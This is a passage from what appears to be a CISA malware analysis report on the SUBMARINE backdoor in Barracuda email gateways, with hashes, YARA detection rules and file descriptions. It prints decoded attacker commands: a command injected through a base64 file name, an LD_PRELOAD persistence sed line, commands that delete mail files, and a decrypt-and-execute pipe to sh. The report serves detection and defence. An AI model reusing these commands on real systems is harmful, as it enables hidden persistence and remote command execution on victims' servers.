<p>			The commands will decode the base64 encoded string and execute the decoded result as a shell command. The commands will pass the contents of the file 'r' to be decoded then decompressed with the 'tar' command. Then, the file 'run.sh' executes with the 'nohup' parameter. The 'nohup' parameter allows the process launched on the shell to continue executing even if the shell is closed. The 'BSMTP_ID' is passed and all errors redirected and discarded to the '/dev/null' directory. Lastly, the contents of the '/root/machine' directory will be removed, permissions are set to executable, and shell scripts containing a name with the string 'mach*' in the root directory are executed.</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%201.jpg?itok=Ixr7Sia5" width="600" height="78" alt="Figure 1" /></div>
  </figure><p><strong>Figure 1. - </strong>The malicious SQL trigger called 'cuda_trigger'.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%202.jpg?itok=qX9Lz0qY" width="600" height="53" alt="Figure 2" /></div>
  </figure><p><strong>Figure 2. - </strong>A small snippet of the base64 blob being written into the file 'r'.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%203.jpg?itok=b8xbUr9d" width="596" height="92" alt="Figure 3" /></div>
  </figure><p><strong>Figure 3. - </strong>A small snippet of the base64 encoded command found after 'r' is written.</p>
<h4>8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh</td>
</tr><tr><th>Size</th>
<td>202 bytes</td>
</tr><tr><th>Type</th>
<td>ASCII text</td>
</tr><tr><th>MD5</th>
<td>c5c93ba36e079892c1123fe9dffd660f</td>
</tr><tr><th>SHA1</th>
<td>e1df0da64a895ff00fc27a41898aa221b5b7d926</td>
</tr><tr><th>SHA256</th>
<td>8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239</td>
</tr><tr><th>SHA512</th>
<td>a07e79b99e02fa52ab5ab75fc2d989d35d4b360a57fdf0ec5569f445fe1820d26915adbd4f30e3a9126e5cabcde9ca840779039393c39e5838618f06db47a4cc</td>
</tr><tr><th>ssdeep</th>
<td>3:jT81L9RUjD+rlczyX837QTa0NDO9Z8giofQHcQMHL6wF8ufIhW0TaT7ZsNvn:c1JRID+pc2XS7Ga0yYgC3GLX8Q0TaRsv</td>
</tr><tr><th>Entropy</th>
<td>5.481015</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_07 : SUBMARINE trojan dropper exploit_kit evades_av hides_executing_code hides_artifacts exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-11"<br />
				       Last_Modified = "20230711_1830"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "evades-av hides-executing-code hides-artifacts"<br />
				       Malware_Type = "trojan dropper exploit-kit"<br />
				       Tool_Type = "exploitation"<br />
				       Description = "Detects ESG FileName exploit samples"<br />
				       SHA256 = "8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239"<br />
				   strings:<br />
				       $s1 = { 7c 20 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }<br />
				       $s2 = { 65 63 68 6f 20 2d 6e }<br />
				       $s3 = { 59 32 46 30 49 43 39 32 59 58 49 76 64 47 31 77 4c 33 49 67 66 43 42 69 59 58 4e 6c 4e 6a 51 67 4c 57 51 67 4c 57 6b 67 66 43 42 30 59 58 49 67 }<br />
				   condition:<br />
				       filesize &lt; 1KB and all of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'machineecho -n Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK _ base64 -d _sh`_' is a SUBMARINE artifact. The file is a shell script identified in the '/root' directory and contains base64 encoded commands. The name of the file is designed to exploit a vulnerability on the target environment where the base64 string within the file name will be executed on the Linux shell.</p>
<p>			--Begin Base64 Decoded Name/Command--<br />
			chmod +x /root/mac*<br />
			sh /root/mach*\`*<br />
			--End Base64 Decoded Name/Command--</p>
<p>			The above commands will change the permissions of the directory, '/root/mac*', to executable.</p>
<p>			The file contains a series of operations, such as decoding a base64 encoded string and executing the decoded result as a shell command. The decoded base64 string represents a series of commands that will be executed by the shell.</p>
<p>			~Begin Base64 Decoded Command~</p>
<p>			cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp<br />
			nohup bash /var/tmp/run.sh &lt;REDACTED BSMTP_ID&gt;    &gt;/dev/null 2&gt;&amp;1 &amp;<br />
			rm -f /root/machine\`*</p>
<p>			~End Base64 Decoded Command~</p>
<p>			This command is identical to the decoded base64 commands found in the SQL trigger identified in the file 'config.snapshot'.</p>
<h4>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>r</td>
</tr><tr><th>Size</th>
<td>4857 bytes</td>
</tr><tr><th>Type</th>
<td>ASCII text, with very long lines</td>
</tr><tr><th>MD5</th>
<td>03e07c538a5e0e7906af803a83c97a1e</td>
</tr><tr><th>SHA1</th>
<td>600452b1cff8d99e41093be8b68f62e7c85f23d7</td>
</tr><tr><th>SHA256</th>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr><tr><th>SHA512</th>
<td>a4a6257dd6f859ae58de3b46879926ce99e3e3edb16db37dc80da4975f5a2866f4cd722233b98c9553e319e61661cae98d535ccb26d8c9709cf6f2efa56b9b3f</td>
</tr><tr><th>ssdeep</th>
<td>96:pjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIZ:pjXDN0wSWQp08UpsmFm4mhCC</td>
</tr><tr><th>Entropy</th>
<td>5.988140</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_02 : SUBMARINE trojan backdoor exploitation hides_artifacts prevents_artifact_access<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-06-29"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "hides-artifacts prevents-artifact-access"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "exploitation"<br />
				       Description = "Detects encoded GZIP archive samples"<br />
				       SHA256_1 = "6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0"<br />
				   strings:<br />
				       $s1 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 }<br />
				       $s2 = { 44 44 44 41 67 50 39 2f 2b 43 38 47 70 2f 36 63 41 46 41 41 41 41 3d 3d 0a}<br />
				       $s3 = { 37 56 4d 70 56 58 4f 37 2b 6d 4c 39 78 2b 50 59 }<br />
				   condition:<br />
				       filesize &lt; 6KB and 3 of them and (math.entropy(0,filesize) &gt; 5.8)<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Relationships</h5>
<table><tbody><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</td>
</tr><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</td>
</tr></tbody></table><h5>Description</h5>
<p>The file 'r' is a SUBMARINE artifact. The file is a Base64 encoded GNU Zip (GZIP) archive. When the 'cat /*/*/r | base64 -d -i | tar -zx -C /*/*' Linux Shell command is applied to 'r', it decompresses two files. The aforementioned Linux Shell command is contained in 'config.snapshot' as a Base64 encoded SQL trigger.</p>
<p>			--Begin Decompressed Files--<br />
			1. run.sh (bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a)<br />
			2. libutil.so (81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab)<br />
			--End Decompressed Files--</p>
<h4>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>run.sh</td>
</tr><tr><th>Size</th>
<td>473 bytes</td>
</tr><tr><th>Type</th>
<td>POSIX shell script, ASCII text executable</td>
</tr><tr><th>MD5</th>
<td>c2e577c71d591999ad5c581e49343093</td>
</tr><tr><th>SHA1</th>
<td>d446e06e40053214788aa1bad17b6d3587a2a370</td>
</tr><tr><th>SHA256</th>
<td>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</td>
</tr><tr><th>SHA512</th>
<td>ffe528fcb448424b1f811a4b9068402971bf2705ad64e556071a062cd89d74d371d3ef41afca38450b7d8457611246a6ba35478dfc83e997950d2f85c8dac80f</td>
</tr><tr><th>ssdeep</th>
<td>12:avOAsp2yBXGTVjnJAIFw/J7G80ZWkbUErPzg:azsphBXSFZFwgLWkXg</td>
</tr><tr><th>Entropy</th>
<td>5.323635</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_03 : SUBMARINE trojan backdoor loader rootkit virus controls_local_machine hides_artifacts infects_files installs_other_components remote_access exploitation information_gathering<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-03"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "controls-local-machine hides-artifacts infects-files installs-other-components"<br />
				       Malware_Type = "trojan backdoor loader rootkit virus"<br />
				       Tool_Type = "remote-access exploitation information-gathering"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a"<br />
				   strings:<br />
				       $s1 = { 73 65 64 20 2d 69 }<br />
				       $s2 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d }<br />
				       $s3 = { 6c 69 62 75 74 69 6c 2e 73 6f }<br />
				       $s4 = { 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c }<br />
				       $s5 = { 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 }<br />
				       $s6 = { 72 6d 20 2d 72 66 }<br />
				       $s7 = { 62 61 73 65 36 34 20 2d 64 }<br />
				       $s8 = { 7c 73 68 }<br />
				       $s9 = { 72 65 73 74 61 72 74 }<br />
				       $s10 = { 2f 64 65 76 2f 6e 75 6c 6c }<br />
				       $s11 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				       $s12 = { 62 61 73 65 36 34 }<br />
				   condition:<br />
				       filesize &lt; 2KB and all of them<br />
				}</li>
<li>rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-05"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "remote-access exploitation"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"<br />
				   strings:<br />
				       $s1 = { 73 6c 65 65 70 }<br />
				       $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }<br />
				       $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }<br />
				       $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }<br />
				       $s5 = { 65 63 68 6f 20 2d 6e 20 27 }<br />
				       $s6 = { 73 68 }<br />
				       $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				   condition:<br />
				       filesize &lt; 2KB and 6 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Relationships</h5>
<table><tbody><tr><td>bbbae0455f...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr></tbody></table><h5>Description</h5>
<p>The file 'run.sh' is a SUBMARINE loader. The file is a shell script located at within the archive 'r' in the '/var/tmp' directory. The purpose of 'run.sh' is to perform a combination of file manipulation, script generation and execution (Figure 4). There are 4 variables within 'run.sh':</p>
<p>			--Begin Variable List--</p>
<p>			B1=$1<br />
			F="/boot/os_tools/hw-set"<br />
			S="/home/product/code/firmware/current/sbin/smtpctl"<br />
			A="/boot/os_tools/libutil.so"<br />
			B=`echo -n "sed -i \"s|exec|BSMTP_ID=$B1 LD_PRELOAD=$A exec|g\" $S"|base64 -w0`</p>
<p>			--End Variable List--</p>
<p>			The script begins by moving SUBMARINE from the '/var/tmp/' directory to the '/boot/os_tools/' directory for persistence.</p>
<p>			The variable "B" is declared as a 'sed' command that replaces all occurrences of the string 'exec' with `BSMTP_ID=$1 LD_PRELOAD=/boot/os_tools/libutil.so exec /home/product/code/firmware/current/sbin/smtpctl'. This 'sed' command is then base64 encoded.</p>
<p>			A new file called 'hw-set' is created in the '/boot/os_tools/' directory. A line is appended to the 'smtpctl' file which checks for the string 'LD_PRELOAD'. If the string is not found, the base64 encoded string stored in variable "B" is decoded and executed as a shell command and 'smtpctl' is restarted.</p>
<p>			The 'chmod' command is used to set executable permissions for 'hw-set'.</p>
<p>			The 'sed' command is used with a '-i' flag to modify the file 'update_version' within the '/boot/os_tools/' directory with an appended string to line 44. The appended string, "system('/boot/os_tools/hw-set 2&gt;&amp;1 &gt;/dev/null &amp;');", will run the file 'hw-set' in the background and redirect both output and errors to 'dev/null' whenever the file 'update_version' is executed.</p>
<p>			The file 'hw-set' is executed and the 'sed' command with the '-i' flag is used to insert the string 'sleep 2m' on line 1 to set a sleep duration of 2 minutes.</p>
<p>			Finally, all files and directories within '/var/tmp/' directory are removed.</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%204.jpg?itok=Zq0MpiQA" width="600" height="329" alt="Figure 4" /></div>
  </figure><p><strong>Figure 4. - </strong>The contents of the file, 'run.sh.'</p>
<h4>b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>hw-set</td>
</tr><tr><th>Name</th>
<td>sedO4CWZ9</td>
</tr><tr><th>Size</th>
<td>341 bytes</td>
</tr><tr><th>Type</th>
<td>POSIX shell script, ASCII text executable, with very long lines</td>
</tr><tr><th>MD5</th>
<td>b860198feca7398bc79a8ec69afc65ed</td>
</tr><tr><th>SHA1</th>
<td>c4c64da81995044ea3447b8ffd07689382b7487b</td>
</tr><tr><th>SHA256</th>
<td>b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43</td>
</tr><tr><th>SHA512</th>
<td>0d4b66dbeb88e8c9fb970572c033ab84b8273734277edb139cdc04560a0547d192a6762fc8ed8138eb43f7d05df6c36aa6bc1987eda4a4b6075e9059e71ef358</td>
</tr><tr><th>ssdeep</th>
<td>6:JkKgPxJooRKGKBNvd/UntDEcQwj7bPfNcgUBZqcL0FcXfFtC2i+RKGKBNvSv:alZJoospwtIclTNcRDnv7CJ+spSv</td>
</tr><tr><th>Entropy</th>
<td>5.713942</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-05"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "remote-access exploitation"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"<br />
				   strings:<br />
				       $s1 = { 73 6c 65 65 70 }<br />
				       $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }<br />
				       $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }<br />
				       $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }<br />
				       $s5 = { 65 63 68 6f 20 2d 6e 20 27 }<br />
				       $s6 = { 73 68 }<br />
				       $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				   condition:<br />
				       filesize &lt; 2KB and 6 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'hw-set' is a SUBMARINE artifact. The file is a shell script located in the '/boot/os_tools/' directory and contains shell commands as well as a base64 encoded string (Figure 5). The shell script is set to sleep for 2 minutes prior to execution. The 'grep' command checks if the string 'LD_PRELOAD' is contained within the 'smtpctl' file located at '/home/product/code/firmware/current/sbin/'. The exclamation point (!) prepending the script is used to check for success or failure of the 'grep' command. If the string 'LD_PRELOAD' is not identified, a base64 encoded 'sed' command is used to modify the 'smtpctl' file (Figure 6).</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%205.jpg?itok=HF4R029D" width="558" height="144" alt="Figure 5" /></div>
  </figure><p><strong>Figure 5. - </strong>The contents of the shell script in the file 'hw-set'.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%206.jpg?itok=h1WbEvJk" width="600" height="54" alt="Figure 6" /></div>
  </figure><p><strong>Figure 6. - </strong>The decoded base64 string contained in the shell script of the file 'hw-set'.</p>
<h4>cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>smtpctl</td>
</tr><tr><th>Size</th>
<td>3759 bytes</td>
</tr><tr><th>Type</th>
<td>POSIX shell script, ASCII text executable</td>
</tr><tr><th>MD5</th>
<td>35a432e40da597c7ab63ff16b09d19d8</td>
</tr><tr><th>SHA1</th>
<td>b798b881b89526051ee5d50f24239b3a952c9724</td>
</tr><tr><th>SHA256</th>
<td>cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a</td>
</tr><tr><th>SHA512</th>
<td>af6aa47f44e604a60930f122ebd47d6c1b83c756b005d79ade8af147bfbfab40f16ba91e32021d65b18b21e06911476fb5d03f050850c8300d1e7d7a3e61c36b</td>
</tr><tr><th>ssdeep</th>
<td>48:t7c4VFuL2/zkanTvNpofcgBnY5NBFTGc5FjJWgkFBhhkQ1jtbA5lwmNdBITf3K3M:xcOko1iyGc6FzKAjDTvssgRaI7Q</td>
</tr><tr><th>Entropy</th>
<td>5.178501</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_05 : SUBMARINE trojan backdoor remote_access_trojan compromises_data_integrity cleans_traces_of_infection hides_artifacts installs_other_components remote_access exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-05"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "compromises-data-integrity cleans-traces-of-infection hides-artifacts installs-other-components"<br />
				       Malware_Type = "trojan backdoor remote-access-trojan"<br />
				       Tool_Type = "remote-access exploitation"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a"<br />
				   strings:<br />
				       $s1 = { 4c 44 5f 50 52 45 4c 4f 41 44 }<br />
				       $s2 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				       $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 2f 6c 69 62 75 74 69 6c 2e 73 6f 20 65 78 65 63 }<br />
				       $s4 = { 3e 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 }<br />
				       $s5 = { 62 73 6d 74 70 64 20 63 6f 6e 74 72 6f 6c 20 73 63 72 69 70 74 }<br />
				       $s6 = { 42 53 4d 54 50 44 5f 50 49 44 }<br />
				       $s7 = { 2f 72 65 6c 6f 61 64 2f 72 65 73 74 61 72 74 }<br />
				   condition:<br />
				       filesize &lt; 6KB and 6 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'smtpctl' is a SUBMARINE loader. The file is a maliciously modified shell script used to remove mail files in 2 directories as well as load SUBMARINE as a shared library for the Batched Simple Mail Transfer Protocol (BSMTP) daemon.</p>
<p>			~Begin File Removal Commands~<br />
			rm -f /mail/scan/body*<br />
			rm -f /mail/tmp/mimeattach.*<br />
			~End File Removal Commands~</p>
<p>			Appended malicious code at the bottom of 'smtpctl.sh' sets the BSMTP_ID and SUBMARINE is preloaded as a shared library from the '/boot/os_tools' directory. It then executes the BSMTP daemon. If the BSMTPD_PID variable is set, debug mode is enabled. If the BSMTPD_PID variable is not set, execution continues without enabling debug mode. Additionally, any instances of the string 'reload' in the command are replaced with 'restart' and all errors are redirected to '/dev/null' (Figure 7).</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%207.jpg?itok=8lWrjKgq" width="575" height="87" alt="Figure 7" /></div>
  </figure><p><strong>Figure 7. - </strong>The appended malicious code loading SUBMARINE as the shared library for the BSMTP daemon. The BSMTP_ID value will be unique per device.</p>
<h4>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>libutil.so</td>
</tr><tr><th>Name</th>
<td>update_version</td>
</tr><tr><th>Size</th>
<td>9396 bytes</td>
</tr><tr><th>Type</th>
<td>ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped</td>
</tr><tr><th>MD5</th>
<td>b745626b36b841ed03eddfb08e6bb061</td>
</tr><tr><th>SHA1</th>
<td>cb20b167795db258b307ddee91ded87a9e7562d0</td>
</tr><tr><th>SHA256</th>
<td>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</td>
</tr><tr><th>SHA512</th>
<td>d6b9dfc9b784ca76386cbbf2c75c7e0ad3ac45e4420a838bc21b1464d07208f46901d7a0c8fbeca90303ce48720d7fd60b76d25cfebf5ea5b385e6b9db10ed98</td>
</tr><tr><th>ssdeep</th>
<td>96:dVdsadO5BT/aucX3Qa/c2D1UKDUzW1MuBFQC0NysEuSobXoWhP:yadO5B71cX3Qgc2uKD+aMLC01EuSo</td>
</tr><tr><th>Entropy</th>
<td>3.466134</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr><tr><th>Path</th>
<td>/boot/os_tools/libutil.so</td>
</tr><tr><th>Path</th>
<td>/boot/os_tools/update_version</td>
</tr><tr><th>Path</th>
<td>/var/tmp/libutil.so</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_01 : SUBMARINE trojan backdoor remote_access_trojan remote_access information_gathering exploitation determines_c2_server controls_local_machine compromises_data_integrity<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10452108"<br />
				       Date = "2023-06-29"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "determines-c2-server controls-local-machine compromises-data-integrity"<br />
				       Malware_Type = "trojan backdoor remote-access-trojan"<br />
				       Tool_Type = "remote-access information-gathering exploitation"<br />
				       Description = "Detects SUBMARINE Barracuda backdoor samples"<br />
				       SHA256_1 = "81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab"<br />
				   strings:<br />
				       $s1 = { 32 35 30 2d 6d 61 69 6c 32 2e 65 63 63 65 6e 74 72 69 63 2e 64 75 63 6b }<br />
				       $s2 = { 6f 70 65 6e 73 73 6c 20 61 65 73 2d 32 35 36 }<br />
				       $s3 = { 65 63 68 6f 20 2d 6e 20 27 25 73 27 20 7c 20 62 61 73 65 36 34 20 2d 64 }<br />
				       $s4 = { 2d 69 76 }<br />
				       $s5 = { 48 65 6c 6c 6f 20 25 73 20 5b 25 73 5d 2c 20 70 6c 65 61 73 65 64 20 74 6f 20 6d 65 65 74 20 79 6f 75 }<br />
				       $s6 = { e8 47 fa ff }<br />
				       $s7 = { 63 6f 6d 6d 61 6e 64 }<br />
				       $s8 = { 2d 69 76 20 36 39 38 32 32 62 36 63 }<br />
				       $s9 = { 73 65 6e 64 }<br />
				       $s10 = { 73 6f 63 6B 65 74 }<br />
				       $s11 = { 63 6f 6e 6e 65 63 74 }<br />
				   condition:<br />
				       filesize &lt; 15KB and 8 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Relationships</h5>
<table><tbody><tr><td>81cf3b162a...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr></tbody></table><h5>Description</h5>
<p>The file 'libutil.so' is the SUBMARINE payload. 'libutil.so' is preloaded into the BSMTP daemon, the Linux executable responsible for receiving emails, and processing Simple Mail Transfer Protocol (SMTP) reply messages. Linux Shared Object Preloading is analogous to Dynamic-Link Library (DLL) side loading and DLL injection in the Windows OS.</p>
<p>			This file is preloaded using the 'LD_PRELOAD' parameter, applied to 'bsmtpd', the BSMTP daemon executable. The preload parameter is added to two configuration files, files that control the behavior of 'bsmtpd.' When the configuration files restart the daemon, 'libutil.so' is loaded into its process memory, giving it the same privileges and access as 'bsmtpd.'</p>
<p>			The malware obtains the BSMTP_ID environment variable from the infected system. The BSMTP_ID has the capacity to be used as a port for malicious traffic. (Figure 8). The process this shared object file is running in, 'bsmtpd', is duplicated and launched using the 'fork' Linux function (Figure 9). The malware opens a connection to 127.0.0.1 on the victim machine it is running on (Figure 10). The 'recv' function is called after the connection is opened, showing that the malware has the capacity to obtain information from the context/environment its executed on.</p>
<p>			Figure 11, Pane 1, shows configuration settings for the BSMTP daemon, that allows any email traffic for the address range of 127/8 and multiple actions including 'ehlo.' Pane 2 shows the malware intaking data, and loading the 'ehlo' action into memory.</p>
<p>			Figure 12, Pane 1, shows the malware, in conjunction with 'snprintf_chk', printing the string 'echo -n '%s' | base64 -d | openssl aes-256-cbc -d -K 66833b26%d -iv 69822b6c%d 2&gt;/dev/null | sh', to the Linux shell. The string is a command that accepts input '%s', decodes it with Base64, decrypts it with AES, pipes errors to std_out and executes it on the target with the 'sh' bash command and 'system' Linux function. Lastly, the malware has the capacity to print the SMTP string, '250-mail2.eccentric.duck Hello %s [%s], pleased to meet you' . Therefore, given this information, the malware has the capacity to accept encoded and encrypted inputs from 'bsmtpd', execute them, and print a message.</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%208.jpg?itok=-eGOUnFk" width="600" height="297" alt="Figure 8" /></div>
  </figure><p><strong>Figure 8. - </strong>Depicts the Linux function 'getenv' "BSMTP_ID" and setting the variable named "SRC_PORT".</p>
  
  
  
  
